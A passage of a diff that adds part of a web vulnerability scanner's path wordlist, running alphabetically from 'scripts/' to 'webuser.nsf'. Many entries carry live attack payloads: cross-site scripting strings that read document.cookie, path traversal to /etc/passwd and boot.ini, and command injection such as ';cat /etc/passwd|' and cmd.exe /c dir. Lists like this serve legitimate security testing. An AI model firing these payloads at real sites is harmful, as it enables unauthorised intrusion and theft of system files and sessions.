+ scripts/samples/search/filesize.idq
3236
+ scripts/samples/search/filetime.idq
3237
+ scripts/samples/search/qfullhit.htw
3238
+ scripts/samples/search/qsumrhit.htw
3239
+ scripts/samples/search/queryhit.idq
3240
+ scripts/samples/search/simple.idq
3241
+ scripts/samples/search/webhits.exe
3242
+ scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
3243
+ scripts/tools/ctss.idc
3244
+ scripts/tools/dsnform
3245
+ scripts/tools/dsnform.exe
3246
+ scripts/tools/getdrvrs.exe
3247
+ scripts/tools/newdsn.exe
3248
+ scripts/tradecli.dll
3249
+ scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
3250
+ scripts/weblog
3251
+ scripts/wsisa.dll/WService=anything?WSMadmin
3252
+ se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
3253
+ search.asp?Search=
3254
+ search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
3255
+ search.asp?term=<%00script>alert('Vulnerable')</script>
3256
+ search.cgi
3257
+ search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
3258
+ search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
3259
+ search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
3260
+ search.php?searchfor=\"><script>alert('Vulnerable');</script>
3261
+ search.php?searchstring=<script>alert(document.cookie)</script>
3262
+ search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
3263
+ search.php?zoom_query=<script>alert(\"hello\")</script>
3264
+ search.pl
3265
+ search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
3266
+ search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
3267
+ search.pl?form=../../../../../../../../../../etc
3268
+ search.pl?form=../../../../../../../../../../etc/passwd%00
3269
+ search.vts
3270
+ search/
3271
+ search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
3272
+ search/SQLQHit.asp
3273
+ search/htx/SQLQHit.asp
3274
+ search/htx/sqlqhit.asp
3275
+ search/inc/
3276
+ search/index.cfm?<script>alert(\"Vulnerable\")</script>
3277
+ search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
3278
+ search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
3279
+ search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
3280
+ search/sqlqhit.asp
3281
+ search97.vts
3282
+ search?NS-query-pat=../../../../../../../../../../etc/passwd
3283
+ search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
3284
+ secret.nsf
3285
+ secret/
3286
+ secure/
3287
+ securecontrolpanel/
3288
+ secured/
3289
+ securelogin/1,2345,A,00.html
3290
+ security/web_access.html
3291
+ sell/
3292
+ sendform.cgi
3293
+ sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
3294
+ sendphoto.php
3295
+ sendtemp.pl?templ=../../../../../../../../../../etc
3296
+ sendtemp.pl?templ=../../../../../../../../../../etc/passwd
3297
+ sensepost.exe?/c+dir
3298
+ server-info
3299
+ server-status
3300
+ server/
3301
+ server_stats/
3302
+ servers/link.cgi
3303
+ service/
3304
+ services/
3305
+ servicio/
3306
+ servicios/
3307
+ servlet/AdminServlet
3308
+ servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
3309
+ servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
3310
+ servlet/Counter
3311
+ servlet/DateServlet
3312
+ servlet/FingerServlet
3313
+ servlet/HelloWorldServlet
3314
+ servlet/IsItWorking
3315
+ servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
3316
+ servlet/PrintServlet
3317
+ servlet/SchedulerTransfer
3318
+ servlet/SearchServlet
3319
+ servlet/ServletManager
3320
+ servlet/SessionManager
3321
+ servlet/SessionServlet
3322
+ servlet/SimpleServlet
3323
+ servlet/SnoopServlet
3324
+ servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
3325
+ servlet/allaire.jrun.ssi.SSIFilter
3326
+ servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
3327
+ servlet/com.newatlanta.servletexec.JSP10Servlet/
3328
+ servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
3329
+ servlet/com.unify.servletexec.UploadServlet
3330
+ servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
3331
+ servlet/gwmonitor
3332
+ servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
3333
+ servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
3334
+ servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
3335
+ servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
3336
+ servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
3337
+ servlet/sq1cdsn
3338
+ servlet/sqlcdsn
3339
+ servlet/sunexamples.BBoardServlet
3340
+ servlet/webacc
3341
+ servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
3342
+ servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
3343
+ servlet/webacc?User.html=noexist
3344
+ servlet/webpub
3345
+ servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
3346
+ servlets/SchedulerTransfer
3347
+ servlets/weboam/oam/oamLogin
3348
+ session/adminlogin
3349
+ session/admnlogin
3350
+ setpasswd.cgi
3351
+ settings/site.ini
3352
+ setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
3353
+ setup.nsf
3354
+ setup/
3355
+ setupweb.nsf
3356
+ sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
3357
+ sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
3358
+ sh
3359
+ shop.cgi?page=../../../../../../../etc/passwd
3360
+ shop.pl/page=;cat%20shop.pl|
3361
+ shop/
3362
+ shop/auth_data/auth_user_file.txt
3363
+ shop/database/metacart.mdb
3364
+ shop/member_html.cgi?file=;cat%20/etc/passwd|
3365
+ shop/member_html.cgi?file=|cat%20/etc/passwd|
3366
+ shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
3367
+ shop/normal_html.cgi?file=../../../../../../etc/issue%00
3368
+ shop/normal_html.cgi?file=;cat%20/etc/passwd|
3369
+ shop/normal_html.cgi?file=|cat%20/etc/passwd|
3370
+ shop/orders/orders.txt
3371
+ shop/php_files/site.config.php+
3372
+ shop/search.php
3373
+ shop/show.php
3374
+ shopa_sessionlist.asp
3375
+ shopadmin.asp
3376
+ shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
3377
+ shopdbtest.asp
3378
+ shopexd.asp?catalogid='42
3379
+ shoponline/fpdb/shop.mdb
3380
+ shopper.cgi?newpage=../../../../../../../../../../etc
3381
+ shopper.cgi?newpage=../../../../../../../../../../etc/passwd
3382
+ shopper/
3383
+ shopping/database/metacart.mdb
3384
+ shopping/diag_dbtest.asp
3385
+ shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
3386
+ shopping300.mdb
3387
+ shopping400.mdb
3388
+ shoppingdirectory/midicart.mdb
3389
+ shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
3390
+ shoutbox.php?conf=../../../../../../../etc/passwd
3391
+ shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
3392
+ show.pl
3393
+ showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
3394
+ showcheckins.cgi?person=<script>alert('Vulnerable')</script>
3395
+ showcheckins.cgi?person=<script>alert('XSS')</script>
3396
+ showmail.pl
3397
+ showmail.pl?Folder=<script>alert(document.cookie)</script>
3398
+ showuser.cgi
3399
+ shtml.dll
3400
+ signon
3401
+ simple/view_page?mv_arg=|cat%20/etc/passwd|
3402
+ simplebbs/users/users.php
3403
+ simplestguest.cgi
3404
+ simplestmail.cgi
3405
+ sips/sipssys/users/a/admin/user
3406
+ site/'
3407
+ site/eg/source.asp
3408
+ site/iissamples/
3409
+ site_searcher.cgi
3410
+ sitemap.xml
3411
+ siteminder
3412
+ siteminder/smadmin.html
3413
+ siteseed/
3414
+ siteserver/publishing/viewcode.asp?source=/default.asp
3415
+ smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
3416
+ smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
3417
+ smbcfg.nsf
3418
+ smconf.nsf
3419
+ smency.nsf
3420
+ smg_Smxcfg30.exe?vcc=3560121183d3
3421
+ smhelp.nsf
3422
+ smmsg.nsf
3423
+ smquar.nsf
3424
+ smsolar.nsf
3425
+ smssend.php
3426
+ smtime.nsf
3427
+ smtp.box
3428
+ smtp.nsf
3429
+ smtpibwq.nsf
3430
+ smtpobwq.nsf
3431
+ smtptbls.nsf
3432
+ smvlog.nsf
3433
+ soap/servlet/soaprouter
3434
+ soapConfig.xml
3435
+ soapdocs/ReleaseNotes.html
3436
+ soapdocs/webapps/soap/
3437
+ soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
3438
+ software.nsf
3439
+ software/
3440
+ soinfo.php?\"><script>alert('Vulnerable')</script>
3441
+ sojourn.cgi?cat=../../../../../../../../../../etc
3442
+ sojourn.cgi?cat=../../../../../../../../../../etc/password%00
3443
+ solaris/
3444
+ some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
3445
+ some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
3446
+ some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
3447
+ source/
3448
+ spelling.php3+
3449
+ spin_client.cgi?aaaaaaaa
3450
+ spwd
3451
+ sql/
3452
+ sqldump.sql
3453
+ sqlnet.log
3454
+ sqlqhit.asp
3455
+ squirrelmail/src/read_body.php
3456
+ src/
3457
+ src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
3458
+ srchadm
3459
+ srvinst.nsf
3460
+ srvnam.htm
3461
+ srvstatus.chl+
3462
+ ss
3463
+ ss.cfg
3464
+ ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
3465
+ sscd_suncourier.pl
3466
+ ssdefs/siteseed.dtd
3467
+ ssi/
3468
+ ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
3469
+ ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
3470
+ staff/
3471
+ start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
3472
+ start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
3473
+ start.php?config=alper.inc.php
3474
+ stat.htm
3475
+ stat.pl
3476
+ stat/
3477
+ staticpages/index.php
3478
+ statistic/
3479
+ statistics/
3480
+ statmail.nsf
3481
+ statrep.nsf
3482
+ stats-bin-p/reports/index.html
3483
+ stats.htm
3484
+ stats.html
3485
+ stats.pl
3486
+ stats.prf
3487
+ stats.txt
3488
+ stats/
3489
+ stats/statsbrowse.asp?filepath=c:\&Opt=3
3490
+ stats_old/
3491
+ statsconfig
3492
+ status.php3
3493
+ status/
3494
+ status?full=true
3495
+ statusconfig.pl
3496
+ statview.pl
3497
+ stauths.nsf
3498
+ stautht.nsf
3499
+ stconf.nsf
3500
+ stconfig.nsf
3501
+ stdnaset.nsf
3502
+ stdomino.nsf
3503
+ stlog.nsf
3504
+ store.cgi?
3505
+ store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
3506
+ store/
3507
+ store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
3508
+ store/agora.cgi?cart_id=<script>alert('XSS')</script>
3509
+ store/agora.cgi?page=whatever33.html
3510
+ store/index.cgi?page=../../../../../../../../etc/passwd
3511
+ story.pl?next=../../../../../../../../../../etc
3512
+ story.pl?next=../../../../../../../../../../etc/passwd%00
3513
+ story/story.pl?next=../../../../../../../../../../etc/passwd%00
3514
+ story/story.pl?next=../../../../../../../../../../passwd%00
3515
+ streg.nsf
3516
+ stronghold-info
3517
+ stronghold-status
3518
+ structure.sql
3519
+ stsrc.nsf
3520
+ style/
3521
+ styles/
3522
+ stylesheet/
3523
+ stylesheets/
3524
+ subir/
3525
+ submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
3526
+ submit?setoption=q&option=allowed_ips&value=255.255.255.255
3527
+ sun/
3528
+ sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
3529
+ super_stats/access_logs
3530
+ super_stats/error_logs
3531
+ support/
3532
+ support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
3533
+ support/messages
3534
+ supporter/index.php
3535
+ supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
3536
+ supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
3537
+ supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
3538
+ supporter/tupdate.php
3539
+ surf/scwebusers
3540
+ survey
3541
+ survey.cgi
3542
+ sw000.asp?|-|0|404_Object_Not_Found
3543
+ swf
3544
+ sws/admin.html
3545
+ sws/manager.pl
3546
+ sys/
3547
+ syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
3548
+ syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
3549
+ syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
3550
+ syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
3551
+ syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
3552
+ syslog.htm?%20
3553
+ system/
3554
+ sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
3555
+ sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
3556
+ sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
3557
+ sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
3558
+ sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
3559
+ sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
3560
+ sysuser/docmgr/iecreate.stm?template=../
3561
+ sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
3562
+ sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
3563
+ sysuser/docmgr/ieedit.stm?url=../
3564
+ sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
3565
+ sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
3566
+ sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
3567
+ sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
3568
+ sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
3569
+ sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
3570
+ sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
3571
+ sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
3572
+ sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
3573
+ sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
3574
+ sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
3575
+ sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
3576
+ sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
3577
+ sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
3578
+ sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
3579
+ sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
3580
+ sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
3581
+ sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
3582
+ tablebuild.pl
3583
+ talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
3584
+ tar/
3585
+ tarjetas/
3586
+ tcb/files/auth/r/root
3587
+ tcsh
3588
+ technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
3589
+ technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
3590
+ technote/print.cgi
3591
+ temp/
3592
+ template/
3593
+ templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
3594
+ temporal/
3595
+ test
3596
+ test-cgi.bat
3597
+ test-cgi.exe?<script>alert(document.cookie)</script>
3598
+ test-cgi.tcl
3599
+ test-cgi?/*
3600
+ test-env
3601
+ test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
3602
+ test.cgi
3603
+ test.htm
3604
+ test.html
3605
+ test.nsf
3606
+ test.php
3607
+ test.php%20
3608
+ test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
3609
+ test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
3610
+ test.txt
3611
+ test/
3612
+ test/info.php
3613
+ test/jsp/Language.jsp
3614
+ test/jsp/buffer1.jsp
3615
+ test/jsp/buffer2.jsp
3616
+ test/jsp/buffer3.jsp
3617
+ test/jsp/buffer4.jsp
3618
+ test/jsp/declaration/IntegerOverflow.jsp
3619
+ test/jsp/extends1.jsp
3620
+ test/jsp/extends2.jsp
3621
+ test/jsp/pageAutoFlush.jsp
3622
+ test/jsp/pageDouble.jsp
3623
+ test/jsp/pageExtends.jsp
3624
+ test/jsp/pageImport2.jsp
3625
+ test/jsp/pageInfo.jsp
3626
+ test/jsp/pageInvalid.jsp
3627
+ test/jsp/pageIsErrorPage.jsp
3628
+ test/jsp/pageIsThreadSafe.jsp
3629
+ test/jsp/pageSession.jsp
3630
+ test/phpinfo.php
3631
+ test/realPath.jsp
3632
+ test/test.cgi
3633
+ testcgi.exe
3634
+ testcgi.exe?<script>alert(document.cookie)</script>
3635
+ testing/
3636
+ tests/
3637
+ texis.exe/?-dump
3638
+ texis.exe/?-version
3639
+ texis.exe/junk
3640
+ texis/junk
3641
+ texis/phine
3642
+ texis/websearch/phine
3643
+ textcounter.pl
3644
+ thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
3645
+ theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
3646
+ theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
3647
+ theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
3648
+ theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
3649
+ themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
3650
+ ticket.php?id=99999
3651
+ tidfinder.cgi
3652
+ tigvote.cgi
3653
+ tinymsg.php
3654
+ title.cgi
3655
+ tmp/
3656
+ tmp_view.php?file=/etc/passwd
3657
+ today.nsf
3658
+ tomcat-docs/index.html
3659
+ tools/
3660
+ topic/entete.php
3661
+ topsitesdir/edit.php
3662
+ tpgnrock
3663
+ tpv/
3664
+ trabajo/
3665
+ trace.axd
3666
+ traffic.cgi?cfg=../../../../../../../../etc/passwd
3667
+ trafficlog/
3668
+ transito/
3669
+ tree
3670
+ tree/
3671
+ trees/
3672
+ troops.cgi
3673
+ tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
3674
+ tsweb/
3675
+ ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
3676
+ ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
3677
+ ttforum/index.php
3678
+ ttp://127.0.0.1:2301/
3679
+ tutos/file/file_new.php
3680
+ tutos/file/file_select.php
3681
+ tvcs/getservers.exe?action=selects1
3682
+ typo3/typo3/dev/translations.php
3683
+ typo3conf/
3684
+ typo3conf/database.sql
3685
+ typo3conf/localconf.php
3686
+ uifc/MultFileUploadHandler.php+
3687
+ ultraboard.cgi
3688
+ ultraboard.pl
3689
+ unlg1.1
3690
+ unlg1.2
3691
+ upd/
3692
+ update.dpgs
3693
+ updates/
3694
+ upload.asp
3695
+ upload.cgi
3696
+ upload.cgi+
3697
+ upload.php?type=\"<script>alert(document.cookie)</script>
3698
+ uploader.php
3699
+ uploadn.asp
3700
+ uploadx.asp
3701
+ uptime
3702
+ url.jsp
3703
+ urlcount.cgi?%3CIMG%20
3704
+ urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
3705
+ us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
3706
+ usage/
3707
+ user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
3708
+ user.php?op=userinfo&uname=<script>alert('hi');</script>
3709
+ user/
3710
+ useraction.php3
3711
+ usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
3712
+ userinfo.php?uid=1;
3713
+ userlog.php
3714
+ userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
3715
+ userreg.nsf
3716
+ users.lst
3717
+ users.nsf
3718
+ users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
3719
+ users/
3720
+ users/scripts/submit.cgi
3721
+ ustats/
3722
+ ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
3723
+ ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
3724
+ usuario/
3725
+ usuarios/
3726
+ utils/sprc.asp
3727
+ utils/sprc.asp+
3728
+ utm/admin
3729
+ utm/utm_stat
3730
+ vars.inc+
3731
+ vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
3732
+ vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
3733
+ vc30/
3734
+ vchat/msg.txt
3735
+ vfs/
3736
+ vgn/ac/data
3737
+ vgn/ac/delete
3738
+ vgn/ac/edit
3739
+ vgn/ac/esave
3740
+ vgn/ac/fsave
3741
+ vgn/ac/index
3742
+ vgn/asp/MetaDataUpdate
3743
+ vgn/asp/previewer
3744
+ vgn/asp/status
3745
+ vgn/asp/style
3746
+ vgn/errors
3747
+ vgn/jsp/controller
3748
+ vgn/jsp/errorpage
3749
+ vgn/jsp/initialize
3750
+ vgn/jsp/jspstatus
3751
+ vgn/jsp/jspstatus56
3752
+ vgn/jsp/metadataupdate
3753
+ vgn/jsp/previewer
3754
+ vgn/jsp/style
3755
+ vgn/legacy/edit
3756
+ vgn/legacy/save
3757
+ vgn/license
3758
+ vgn/login
3759
+ vgn/login/1,501,,00.html?cookieName=x--\>
3760
+ vgn/performance/TMT
3761
+ vgn/performance/TMT/Report
3762
+ vgn/performance/TMT/Report/XML
3763
+ vgn/performance/TMT/reset
3764
+ vgn/ppstats
3765
+ vgn/previewer
3766
+ vgn/record/previewer
3767
+ vgn/style
3768
+ vgn/stylepreviewer
3769
+ vgn/vr/Deleting
3770
+ vgn/vr/Editing
3771
+ vgn/vr/Saving
3772
+ vgn/vr/Select
3773
+ vider.php3
3774
+ view-source
3775
+ view-source?view-source
3776
+ view_item?HTML_FILE=../../../../../../../../../../etc
3777
+ view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
3778
+ view_source.jsp
3779
+ viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
3780
+ viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
3781
+ viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
3782
+ viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
3783
+ viewlogs.pl
3784
+ viewpage.php?file=/etc/passwd
3785
+ viewsource?/etc/passwd
3786
+ viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
3787
+ viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
3788
+ viralator.cgi
3789
+ virgil.cgi
3790
+ visadmin.exe
3791
+ visitor.exe
3792
+ vote.cgi
3793
+ vpasswd.cgi
3794
+ vpuserinfo.nsf
3795
+ vq/demos/respond.pl?<script>alert('Vulnerable')</script>
3796
+ vq/demos/respond.pl?<script>alert('XSS')</script>
3797
+ w-agora/
3798
+ w3-msql
3799
+ w3-sql
3800
+ w3perl/admin
3801
+ wa.exe
3802
+ wais.pl
3803
+ warez/
3804
+ way-board.cgi?db=/etc/passwd%00
3805
+ way-board/way-board.cgi?db=/etc/passwd%00
3806
+ wbboard/profile.php
3807
+ wbboard/reply.php
3808
+ wconsole.dll
3809
+ web-console/ServerInfo.jsp%00
3810
+ web.config
3811
+ web.nsf
3812
+ web/
3813
+ web800fo/
3814
+ webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
3815
+ webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
3816
+ web_app/WEB-INF/webapp.properties
3817
+ webaccess.htm
3818
+ webaccess/access-options.txt
3819
+ webadmin.nsf
3820
+ webadmin/
3821
+ webais
3822
+ webalizer/
3823
+ webamil/test.php
3824
+ webamil/test.php?mode=phpinfo
3825
+ webapp/admin/_pages/_bc4jadmin/
3826
+ webbbs.cgi
3827
+ webbbs.exe
3828
+ webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
3829
+ webboard/
3830
+ webcache/
3831
+ webcache/webcache.xml
3832
+ webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
3833
+ webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
3834
+ webcalendar/login.php
3835
+ webcalendar/view_m.php
3836
+ webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
3837
+ webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
3838
+ webcart-lite/
3839
+ webcart-lite/config/import.txt
3840
+ webcart-lite/orders/import.txt
3841
+ webcart/
3842
+ webcart/carts/
3843
+ webcart/config/
3844
+ webcart/config/clients.txt
3845
+ webcart/orders/
3846
+ webcart/orders/import.txt
3847
+ webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
3848
+ webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
3849
+ webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
3850
+ webdata/
3851
+ webdav/index.html
3852
+ webdist.cgi?distloc=;cat%20/etc/passwd
3853
+ webdriver
3854
+ webfind.exe?keywords=01234567890123456789
3855
+ webgais
3856
+ webif.cgi
3857
+ weblog/
3858
+ weblogic
3859
+ weblogs/
3860
+ webmail/
3861
+ webmail/blank.html
3862
+ webmail/horde/test.php
3863
+ webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
3864
+ webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
3865
+ webmail/lib/emailreader_execute_on_each_page.inc.php
3866
+ webmail/src/read_body.php
3867
+ webmap.cgi
3868
+ webmaster_logs/
3869
+ webnews.pl
3870
+ webplus.exe?about
3871
+ webplus?about
3872
+ webplus?script=../../../../../../../../../../etc
3873
+ webplus?script=../../../../../../../../../../etc/passwd
3874
+ websendmail
3875
+ website/
3876
+ webspirs.cgi?sp.nextform=../../../../../../../../../../etc
3877
+ webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
3878
+ webstats/
3879
+ webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
3880
+ webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
3881
+ webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
3882
+ webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
3883
+ webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
3884
+ webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
3885
+ webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
3886
+ webtop/wdk/
3887
+ webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
3888
+ webtop/wdk/samples/index.jsp
3889
+ webuser.nsf
